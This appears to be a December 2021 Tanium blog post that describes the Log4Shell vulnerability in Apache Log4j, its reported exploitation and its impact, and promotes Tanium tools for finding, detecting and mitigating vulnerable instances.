The volume of software flaws published to the US National Vulnerability Database (NVD) in 2021 hit a record high just last week. But few, if any, have recorded a CVSS score of 10.0. Unfortunately, Apache has saved the worst till last after a new zero-day bug was discovered in its popular Log4j logging service late last week.
Threat actors reacted with characteristic agility and are already exploiting the vulnerability for various ends across many platforms. The impact is being felt across the world as security teams in technology vendors and enterprises alike scramble to find, fix or mitigate the issue.
Watch this short video to see how Tanium can help identify, investigate and remediate Log4Shell.
What is Log4j/Log4Shell?
Log4j is a popular open-source logging utility used by millions of Java applications. The underlying “improper input validation” flaw (CVE-2021-44228) has been dubbed “Log4Shell.” It can be exploited relatively easily to enable remote code execution on a compromised machine — by forcing a vulnerable app to log a specific string of characters. As applications log many different types of events, there are various ways to do this. For the Minecraft video game, it was apparently as easy as pasting a short message into a chatbox.
An updated version of the utility, 2.15.0, is available now. However, the difficulty for security teams may be in finding instances of Log4j across their entire environment, especially if they are hidden in dependencies.
What has been the impact so far?
Tech firms as diverse as Microsoft, Cisco, Apple, Oracle, VMware and Elastic are reported as being exposed to Log4Shell. Many are rushing to patch their environments and share advice with customers.
Reports suggest that attackers are scanning the internet en masse for vulnerable systems. Attacks have been detected exploiting the bug to install coin miners, expose Amazon Web Services (AWS) keys, and install Cobalt Strike for ransomware, among other things.
Tanium’s product security team investigated CVE-2021-44228 and found no instances where Tanium software is impacted by the vulnerability in log4j.
‘Tis the season for hackers
Chris Vaughan, EMEA vice president, technical account management at Tanium, says this vulnerability is the worst he’s seen in his career, in terms of how many people and organizations are affected and how severe the impact could be. He believes attackers will particularly target the eCommerce sector due to the amount of money that runs through these websites.
“The timing of this vulnerability emerging is terrible for these companies as they will now be making emergency changes to their IT environments at their busiest time of the year with Christmas approaching,” Vaughan explains. “To minimize the impact, they should follow the same advice that I would offer organizations from all sectors, which is to patch the vulnerability as soon as they can. They should start with external-facing parts of their IT infrastructure first, such as their website, before shifting their focus to internal systems.”
How can Tanium help?
Fortunately, Tanium offers the tools to find potentially vulnerable instances, wherever they are, identify signs of exploitation, and mitigate the issue. Here’s how:
Find vulnerable instances
- Use Tanium Interact with Tanium Index to identify Apache Log4j2 JAR files and their versions
- Use Tanium Reveal to run a quick search of JAR, EAR, and WAR files for use of the Log4j library
- Use Tanium Comply to build a vulnerability assessment for CVE-2021-44228
Identify signs of exploitation
- Use Tanium Threat Response to import the relevant YARA rules
- Alternatively, use Tanium Threat Response to search for vulnerable Log4j bundles by importing the relevant hashes
Mitigate or patch CVE-2021-44228
- Use Tanium Interact to build Tanium packages designed to mitigate the bug by:
- Enabling the log4j2.formatMsgNoLookups system property (for Log4j versions 2.10 – 2.14.1)
- Removing JndiLookup.class from the classpath (for Log4j versions 2.10 and older)
- Use Tanium Deploy to deliver updated versions of software you’ve identified as impacted in your environment
The impact of Log4Shell on the threat landscape and global security teams is still unclear, although the repercussions could be long-lasting. But best practices remain the same. As always, mitigating critical risk in your IT environment starts with visibility and control.